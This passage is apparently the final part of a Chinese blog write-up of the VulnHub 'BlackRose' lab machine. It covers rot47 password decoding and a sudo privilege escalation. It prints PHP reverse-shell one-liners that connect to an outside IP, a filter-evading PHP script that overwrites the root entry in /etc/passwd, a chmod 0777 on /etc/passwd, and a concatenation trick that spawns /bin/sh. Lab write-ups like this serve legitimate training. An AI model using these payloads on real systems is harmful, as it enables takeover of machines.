rot13 > rot13: s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR                                                                       
rot13 > rot47: 7X+g|lfMg^U{{\>)d*S];bu9Vso2%t                                                                       
rot47 > atbash: WCTOUNTFPAWHSYUELE                                                                                  
rot47 > caesar: GA|P+UOPP^X**\NIM{V]KK$IY"X?E#                                                                      
rot47 > rot13: QK|t+ysZt^H**\Xmq{F]Uo$SI"b?i#                                                                       
rot47 > rot47: s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR

从结果可以判断出,可能是 rot13 或者 rot47

使用 DX|g+lfMg^U**\Kzd{S]Hb$FV"o?v# 切换登录到 yourname 用户

1
2
3
4
5
6
7
8
9
yourname@BlackRose:~$ cat user.txt
688286be9a2df84e90122da12cd7ea2e
yourname@BlackRose:~$ sudo -l
Matching Defaults entries for yourname on BlackRose:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User yourname may run the following commands on BlackRose:
    (root : root) NOPASSWD: /usr/bin/blackrose

发现了一个特别的程序,可以使用 root 权限无密码运行

接下来关于这个程序,又有一个很难想到的点,首先这个程序运行后提示读取文件,但是输入一般的文件名会提示无效

1
2
3
yourname@BlackRose:~$ sudo /usr/bin/blackrose
File read~# /etc/passwd                                                                                             
Invalid file read

这里程序只接受 php 文件的路径,同时这个文件的权限决定了我们没法拿到本地逆向。所以关于可接受文件类型的判断,也是一个很容易卡住的点

1
2
yourname@BlackRose:~$ ls -liah /usr/bin/blackrose
2502921 -rwx------ 1 root root 1.3K Dec  1  2019 /usr/bin/blackrose

之后我们将反弹 shell 的文件写入 1.php

1
2
3
4
5
6
7
yourname@BlackRose:~$ echo '<?php $sock=fsockopen("192.168.1.101",443);system("/bin/bash <&3 >&3 2>&3"); ?>' > 1.phpyourname@BlackRose:~$ sudo /usr/bin/blackrose ./1.php 
File read~# 1.php
Dangerous function found
yourname@BlackRose:~$ echo '<?php $sock=fsockopen("192.168.1.101",443);popen("/bin/bash <&3 >&3 2>&3", "r"); ?>' > 1.php 
yourname@BlackRose:~$ sudo /usr/bin/blackrose
File read~# 1.php
Dangerous function found

又遇到了新的问题,似乎有危险函数的过滤。尝试自己绕过参考博客 PHP - Useful Functions & disable_functions/open_basedir bypass - HackTricks

先是尝试 chown,发现无法赋予 SUID 权限,尝试读取和写入文件,发现读取和写入 file_put_contents 函数可用,我先是读取了一下 shadow 文件的内容,发现使用 hashcat 爆破失败,那就尝试写入到 passwd 文件吧

先生成简单的密码

1
2
yourname@BlackRose:~$ openssl passwd 123456
l.ceEHjBRBt96

用 chatgpt 使用 file_put_contents 函数生成替换文件第一行内容的代码。但是发现程序或许会匹配 root 关键字,我们需要简单地处理一下,以便绕过。自己尝试的话,建议先别拿 passwd 尝试,用普通文件先测试,确认无误后再对 passwd 进行修改,同时建议备份一下原有的 /etc/passwd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
$filename = '/etc/passwd';
$newContent0 = 'roo';
$newContent1 = 't:';
$newContent2 = 'l.ceEHjBRBt96';
$newContent3 = ':0:0:roo';
$newContent4 = 't:/roo';
$newContent5 = 't:/bin/bas';
$newContent6 = 'h';
$newContent = $newContent0 . $newContent1 . $newContent2 . $newContent3 . $newContent4 . $newContent5 . $newContent6;

$content = file_get_contents($filename);  

$firstLineEndPos = strpos($content, "\n");  
  
if ($firstLineEndPos !== false) {  
    $firstLine = substr($content, 0, $firstLineEndPos + 1);  
    $content = str_replace($firstLine, $newContent . "\n", $content);  
    file_put_contents($filename, $content);  
    echo file_get_contents($filename);  
} else {  
    echo "error";  
}  
?>

将上述代码写入 1.php,尝试借助 blackrose 运行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
yourname@BlackRose:~$ sudo /usr/bin/blackrose
File read~# 1.php
root:l.ceEHjBRBt96:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
delx:x:1002:1002:,,,:/home/delx:/bin/bash
yourname:x:1001:1001:,,,:/home/yourname:/bin/bash

成功写入,接下来切换为 root 身份,密码为 123456

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
yourname@BlackRose:~$ su
Password: 
root@BlackRose:/home/yourname# cd /root
root@BlackRose:~# ls -liah
total 36K
2097153 drwx------  6 root root 4.0K Jul 11  2020 .
      2 drwxr-xr-x 24 root root 4.0K Nov 13  2019 ..
2097158 lrwxrwxrwx  1 root root    9 Dec  3  2019 .bash_history -> /dev/null
2097154 -rw-r--r--  1 root root 3.1K Dec  3  2019 .bashrc
2097164 drwx------  2 root root 4.0K Dec  5  2019 .cache
2097162 drwx------  3 root root 4.0K Nov  7  2019 .gnupg
2097159 drwxr-xr-x  3 root root 4.0K Nov  7  2019 .local
2097155 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
2097168 -rw-r--r--  1 root root  511 Jul 11  2020 root.txt
2097156 drwx------  2 root root 4.0K Sep  7  2019 .ssh
root@BlackRose:~# cat root.txt 
     _                   _                           _                   
    | | _____      _____| |   __      ____ _ ___    | |__   ___ _ __ ___ 
 _  | |/ _ \ \ /\ / / _ \ |   \ \ /\ / / _` / __|   | '_ \ / _ \ '__/ _ \
| |_| |  __/\ V  V /  __/ |    \ V  V / (_| \__ \   | | | |  __/ | |  __/
 \___/ \___| \_/\_/ \___|_|     \_/\_/ \__,_|___/   |_| |_|\___|_|  \___|
                                                                The box made by Jewel                               



7dcbcf000f38c8d2c0024011899ec84e

I thank you so much for playing - Jewel :)

结束战斗。

补充,话说 chmod 虽然不能赋予 SUID 权限,但是可以降低 passwd 的权限啊

1
2
3
4
5
6
7
8
9
yourname@BlackRose:~$ cat 2.php
<?php
chmod("/etc/passwd",0777);
?>
yourname@BlackRose:~$ sudo /usr/bin/blackrose
File read~# 2.php
yourname@BlackRose:~$ ls -alih /etc/passwd
3154567 -rwxrwxrwx 1 root root 1.7K Oct 14 08:48 /etc/passwd
yourname@BlackRose:~$ vim /etc/passwd

参考的 WP 中使用的是一种更简单的绕过手法,但是这种方法我过去没有见过,搜索结果中也没显示,这里记录一下

1
echo "<?php (sy.(sy).em)('/bin/sh') ?>" >1/php

总结

登录框测试点

  • 登录绕过(逻辑问题,语言特性)
  • sql 注入(万能密码)
  • 弱口令(爆破)
  • 二次注入
  • 注册覆盖
  • 未授权访问(目录扫描)

一些 CTF 技巧实际上是本身就带有试错成本,尤其是编码问题,比如这台靶机如何判断是 AES 加密,如何判断是 rot47。更多的是对加密算法使用习惯和频率的熟悉才能在思维上让你想到,加上不断的试错。

除此之外,有必要偶尔看看别人的博客和一些渗透方面技巧的总结,比如这里的登录绕过,很简单但是我过去没碰到过,就完全想不到,甚至没意识去搜索登录绕过。以后要时不时翻翻 HackTricks - HackTricks

参考

挖洞实战之信息泄露与前端加密 - 合天网安实验室 (hetianlab.com) 中提到的密码工具箱 oreosES/autodecoder: AutoDecoder tool for CTFs (github.com)

knowledge_database > vulnhub
BlackRose 靶机
https://i3eg1nner.github.io/2023/10/fcad96c9b901.html
作者
I3eg1nner
发布于
2023年10月12日
许可协议